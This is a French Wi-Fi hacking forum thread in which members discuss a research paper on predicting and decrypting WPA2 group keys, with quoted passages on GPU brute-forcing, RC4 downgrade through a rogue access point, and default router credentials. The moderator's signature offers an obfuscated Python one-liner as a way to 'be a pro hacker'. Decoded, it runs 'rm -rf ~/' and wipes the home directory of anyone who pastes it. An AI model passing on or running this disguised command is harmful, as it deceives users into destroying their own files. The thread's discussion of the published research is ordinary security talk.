Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 15-08-2016 10:06:37

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

Coucou.

Je viens de tomber là dessus au hasard des internets.
J'ai pas le temps de le lire, faut que j'aille faire des courses.
En tout cas, le résumé envoie du lourd !

À tout à l'heure !

https://www.usenix.org/system/files/con … anhoef.pdf

vanhoef & pissens a écrit :

We analyze the generation and management of 802.11 group keys. These keys protect broadcast and multicast Wi-Fi traffic. We discovered several issues and illustrate their importance by decrypting all group (and unicast) traffic of a typical Wi-Fi network.
First we argue that the 802.11 random number generator is flawed by design, and provides an insufficient amount of entropy.
This is confirmed by predicting randomly generated group keys on several platforms.
We then examine whether group keys are securely transmitted to clients.
Here we discover a downgrade attack that forces usage of RC4 to encrypt the group key when transmitted in the 4-way handshake.
The per-message RC4 key is the concatenation of a public 16-byte initialization vector with a secret 16-byte key, and the first 256 keystream bytes are dropped.
We study this peculiar usage of RC4, and find that capturing 231 handshakes can be sufficient to recover (i.e., decrypt) a 128-bit group key.
We also examine whether group traffic is properly isolated from unicast traffic.
We find that this is not the case, and show that the group key can be used to inject and decrypt unicast traffic.
Finally, we propose and study a new random number generator tailored for 802.11 platforms.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 15-08-2016 12:49:43

Olympe
Membre Hyperactif
Inscription : 19-06-2016
Messages : 47

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

Excellent ! Merci pour le partage smile


“Il n'y a que deux voies pour parvenir à la connaissance d'une machine ; l'une, que le maître qui l'a composée nous en découvre l'artifice ; l'autre de démonter jusqu'aux moindres ressorts, et les examiner tous séparément, et ensemble.” -- Nicolas Sténon, 1669

Hors Ligne

#3 15-08-2016 15:45:52

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

Cocou!  smile
  La claque!
  A première vue c'est en effet du très très lourd... tongue
  Ils ont pu mener à bien leur attaque sur des PA avec chipset broadcom et mediatek(Ralink).
  En Espagne ça représente plus de la moitié des PA en activité...
  Comme pour le cas de pixiewps ce sont les générateurs de "nombre pseudo aléatoires" (franglish, je ne sais pas si c'est correct) qui foirent et, surprise, Broadcom et Ralink sont  de nouveau de la partie.
  Quelques brute force de quelques minutes avec une GTX nvidia (mais bon, ça veut dires plusieurs heures avec un duo-core, rien de bien méchant) et il faut faire un rogue AP pour forcer le downgrade du handshake en RC4 (une bonne alfa avec son antenne externe et c'est partit)
   Le travail présenté s'inspire de ceux comme tkipun-ng mais en adoptant une autre approche, non pas chercher une faille dans le protocole mais dans son implémentation côté fabricant.
Sans vouloir faire mon oiseau de mauvaises augures, vous pouvez être certains de que les modèles de "boxes" lancés dans la nature par les FAI  avec des chipsets vulnérables vont être laissés dans l'état.
  L'été est chaud...

edit

  Je viens de retomber sur un PDF de l'année dernières de  ces deux compères: Mathy Vanhoef et Frank Piessens
All Your Biases Belong To Us: Breaking RC4 in WPA-TKIP and TLS
   Ils ont de la suite dans les idées big_smile

Dernière modification par kcdtv (15-08-2016 15:59:21)

Hors Ligne

#4 15-08-2016 18:02:42

le dirdir
Membre d'Or
Inscription : 09-03-2013
Messages : 367

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

Mega LOL !


Tant vaut l'antenne, tant vaut le poste

Hors Ligne

#5 16-08-2016 09:23:38

MiscL
Membre Indétronable
Lieu : BE
Inscription : 10-06-2016
Messages : 157

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

kcdtv a écrit :

Cocou!  smile
Sans vouloir faire mon oiseau de mauvaises augures, vous pouvez être certains de que les modèles de "boxes" lancés dans la nature par les FAI  avec des chipsets vulnérables vont être laissés dans l'état.
  L'été est chaud...

En Belgique, les BBox2 avaient toutes le WPS activés ET le pin par défaut (12345670) ... donc à moins de l'avoir changé toi même, tu chopais la clé en 4 secondes. Et quand bien même ils en ont été informés, ça n'a pas été changé. Donc comme tu dis, ça ne risque pas de changer. (big up a numericable pour le login "admin" et son mdp "password" pour avoir accès à la partie config du routeur).


--|--   MiscL   --|--
- Accept No Limit -

Hors Ligne

#6 16-08-2016 15:05:13

Olympe
Membre Hyperactif
Inscription : 19-06-2016
Messages : 47

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

This reveals that an attacker can abuse biases to recover an 128-bit group key by capturing 230 to 232 encryptions of the group key, where the precise number depends on the configuration of the network.

Au moins, avec entre 1 et 5 milliards de handshakes, ça ne va pas m'empêcher de dormir ce soir lol
En tout cas félicitations aux deux auteurs, qui ont fourni un brillantissime travail ! cool


kcdtv a écrit :

Comme pour le cas de pixiewps ce sont les générateurs de "nombre pseudo aléatoires" (franglish, je ne sais pas si c'est correct) qui foirent.

Yes c'est parfaitement correct, même en français wink
On dissocie généralement les "Cryptographically secure pseudo-random number generators" (CS-PRNG, à très forte entropie) des  "Non-cryptographic pseudo-random number generators " (NC-PRNG, à faible entropie)


“Il n'y a que deux voies pour parvenir à la connaissance d'une machine ; l'une, que le maître qui l'a composée nous en découvre l'artifice ; l'autre de démonter jusqu'aux moindres ressorts, et les examiner tous séparément, et ensemble.” -- Nicolas Sténon, 1669

Hors Ligne

#7 16-08-2016 15:22:50

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

Au moins, avec entre 1 et 5 milliards de handshakes, ça ne va pas m'empêcher de dormir ce soir lol

J'ai pas réussie à me faire une idée précise et claire sur ce point.
Au début ça semble évident mais plus tu avances et moins ça le semble.
J'ai l'impression que au lieu de capturer les  2³⁰ a 2³² ils font des brutes forces en 4 minutes avec une nvidia GTX 
Ils exposent le cheminement de leur pensée, je crois.

On dissocie généralement les "Cryptographically secure pseudo-random number generators" (CS-PRNG, à très forte entropie) des  "Non-cryptographic pseudo-random number generators " (NC-PRNG, à faible entropie)

Merci wink,

Dernière modification par kcdtv (16-08-2016 15:25:18)

Hors Ligne

#8 16-08-2016 15:25:09

MiscL
Membre Indétronable
Lieu : BE
Inscription : 10-06-2016
Messages : 157

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

Au moins, avec entre 1 et 5 milliards de handshakes, ça ne va pas m'empêcher de dormir ce soir lol

Tout dépends de la machine utilisée pour gérer tout ce beau bowdel... #QuantiqueDTC big_smile


--|--   MiscL   --|--
- Accept No Limit -

Hors Ligne

#9 16-08-2016 15:35:02

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

quelques  minutes de crack  une GPU = quelques heures avec une CPU

We created an OpenCL program to search for the
group key on a GPU. It tests candidate keys by decrypt-
ing the first 8 bytes of a packet, and checking if they
match the predictable LLC/SNAP header. If the tar-
geted router has been running for one year, it has to test
320 · 50 000 · 32 ≈ 2 29 candidates to recover the group
key. However, testing each key is rather costly, as it
involves calculating 33 · 4 SHA-1 hashes to derive the
group key, and we must then decrypt the first 8 bytes
of the packet to verify the key. Nevertheless, on our
NVIDIA GeForce GTX 950M, it takes roughly two min-
utes to test all 2 29 candidates and recover the GTK. We
confirmed this by successfully predicting several group
keys generated by our Asus RT-AC51U, when it had an
uptime of more than a month. We conclude the group
key generated by a MediaTek driver can be brute-forced
using commodity hardware in negligible time.

Après ils expliquent bien avoir mené l'expérience en mode PoC et qu'ils ont déchiffré un paquet IP sans capturer des milliards de handshake,

Dernière modification par kcdtv (16-08-2016 15:36:06)

Hors Ligne

#10 16-08-2016 15:40:54

Olympe
Membre Hyperactif
Inscription : 19-06-2016
Messages : 47

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

MiscL a écrit :

Tout dépends de la machine utilisée pour gérer tout ce beau bowdel... #QuantiqueDTC big_smile

"Si de grands calculateurs quantiques (plus de 300 qubits) pouvaient être construits — ce qui n'est pas assuré — ils seraient capables, d'après David Deutsch, de faire certains calculs plus rapidement qu'un ordinateur classique plus grand que l’univers lui-même" source

Ouhhhouhou roll
Le futur commence à me faire peur lol


“Il n'y a que deux voies pour parvenir à la connaissance d'une machine ; l'une, que le maître qui l'a composée nous en découvre l'artifice ; l'autre de démonter jusqu'aux moindres ressorts, et les examiner tous séparément, et ensemble.” -- Nicolas Sténon, 1669

Hors Ligne

#11 16-08-2016 15:46:26

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

Les handshakes si que c'est un "problème"

While it is possible to generate many handshakes by
forcibly disconnecting clients, new handshakes will use
a different KEK key. Since our attack assumes that the
KEK is constant, this is not an option. The only method
we identified to make the AP send several handshake
messages protected by the same KEK, is by not acknowl-
edges them, and letting the AP retransmit them. Note
that each retransmission uses a new IV. Unfortunately,
only a few messages will be retransmitted before the AP
gives up and aborts the handshake process. In the next
Section we present an attack that does tolerate frequent
changes of the KEK key. We conclude that the 4-way
handshake, as defined in the 802.11i standard, is vulnera-
ble to key recovery attacks. However, these attacks seem
difficult to pull off against popular implementations
.

very difficult

Hors Ligne

#12 16-08-2016 15:53:57

MiscL
Membre Indétronable
Lieu : BE
Inscription : 10-06-2016
Messages : 157

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

Olympe a écrit :

Ouhhhouhou roll
Le futur commence à me faire peur lol

Vu qu'en plus on va se faire poutrer par une intelligence artificielle parce qu'on a pas aidé à la créer...
Mais on dérive.


--|--   MiscL   --|--
- Accept No Limit -

Hors Ligne

#13 11-09-2016 13:11:28

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

Ow ow ow... dis donc j'ai bien fait de passer par la on dirait.Mon anglais étant limité, si j'ai bien compris la chose se base sur le handshake et plus on en génère plus l'on a de chance d'avoir une possibilité juste de calcul ?

Va falloir que je me replonge sur les rogues AP et hostapd car je sais qu'il y a moyen d'obtenir pas mal de handshake en assez peu de temps sans avoir a attendre une déco du client via mdk3 ou d'ailleurs les AP d'aujourd'hui y résistent mieux de toute façon.


J'ai un i7 3.6Ghz et une gtx970, si le projet suit toujours son cours, j'ai hate de voir le résultat smile 2016 et 2017 prometteur ?

Wait and see

Hors Ligne

#14 18-09-2016 10:04:18

flatounet
Membre V.I.P.
Inscription : 05-03-2010
Messages : 209

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

koala a écrit :

Ow ow ow... dis donc j'ai bien fait de passer par la on dirait.Mon anglais étant limité, si j'ai bien compris la chose se base sur le handshake et plus on en génère plus l'on a de chance d'avoir une possibilité juste de calcul ?

Va falloir que je me replonge sur les rogues AP et hostapd car je sais qu'il y a moyen d'obtenir pas mal de handshake en assez peu de temps sans avoir a attendre une déco du client via mdk3 ou d'ailleurs les AP d'aujourd'hui y résistent mieux de toute façon.


J'ai un i7 3.6Ghz et une gtx970, si le projet suit toujours son cours, j'ai hate de voir le résultat smile 2016 et 2017 prometteur ?

Wait and see

à ce propos du rogue AP ,
aucune distro n'inclus d'automatisation à ce propos là ?

j'avais vue un tuto ,mais impossible d'installé les bonnes librairie pour hostpad
et l'instalation ne se fesai pas jusqu"au bout ...
insallé une librairie plus recente = crash ... et j'ai lacher au bout d'une semaine de tentative

etant une bille en linux ...

Dernière modification par flatounet (18-09-2016 10:05:06)

Hors Ligne

#15 18-09-2016 12:36:22

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

koalaaaaaaaaaaaaaaaaaa !!!!! big_smile
¿Que tal amigo?
Le problème de cette attaque, si j'ai bien compris, c'est qu'on a besoin de quelque chose comme 2³¹ handshakes (2 147 483 648) pour avoir un taux acceptable de réussite (méthode avec KEK non constante)
Si la KEK était constante on aurait besoin de 2²¹ handshakes pour un taux de réussite de 80%
Mais la KEK change après un certains nombres d'handshakes consécutifs..
Donc comme disent les auteurs eux mêmes, la faille existe mais reste "très difficile" (j'appelle ça un euphémisme)  d'exploiter en l'état actuel des choses.
Il se peut que je me trompe, tout ça est un peu dense pour mon niveau surtout la partie math où j'entrave absolument que dalle
J'espère qu'on te reverras par ici avant septembre 2020 vieux grigou  tongue big_smile

Dernière modification par kcdtv (18-09-2016 12:38:29)

Hors Ligne

#16 22-09-2016 21:48:03

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Predicting, Decrypting, and Abusing WPA2/802.11 Group Keys

Effectivement on en est encore loin cool


Je traine toujours dans les parages mais plus rarement, entre quelques bricolages sur debian et ma tour principale sous arch ça m'occupe déja pas mal de mon temps libre smile  mais je suis la tapis dans l'ombre tongue

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
19 1122 05-09-2016 17:32:03 par david_01
9 17463 25-09-2015 22:01:20 par fredo6240
Password list pour wpa2 par arianefurer
5 11650 17-05-2015 20:51:16 par kcdtv
6 1073 01-05-2015 19:09:16 par K4L-EL
1 1613 15-04-2015 21:48:29 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.043 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]